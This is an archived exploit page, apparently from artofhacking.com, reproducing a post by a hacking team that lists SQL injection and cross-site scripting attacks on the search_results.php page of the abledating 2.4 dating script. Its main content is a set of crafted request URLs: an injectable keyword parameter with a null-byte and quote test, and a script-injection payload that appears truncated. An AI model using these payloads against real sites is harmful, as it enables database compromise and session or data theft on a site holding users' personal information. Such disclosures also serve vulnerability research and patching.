AOH :: HP Unsorted A :: BX3286.HTM

abledating 2.4 >> Sql injection and cross site scripting on search_results.php



abledating 2.4 >> Sql injection and cross site scripting on search_results.php
abledating 2.4 >> Sql injection and cross site scripting on search_results.php



By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'>alert(42119.7535489005)%3B&status=online&save_search=on&search_name=My%20search&photo=on

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.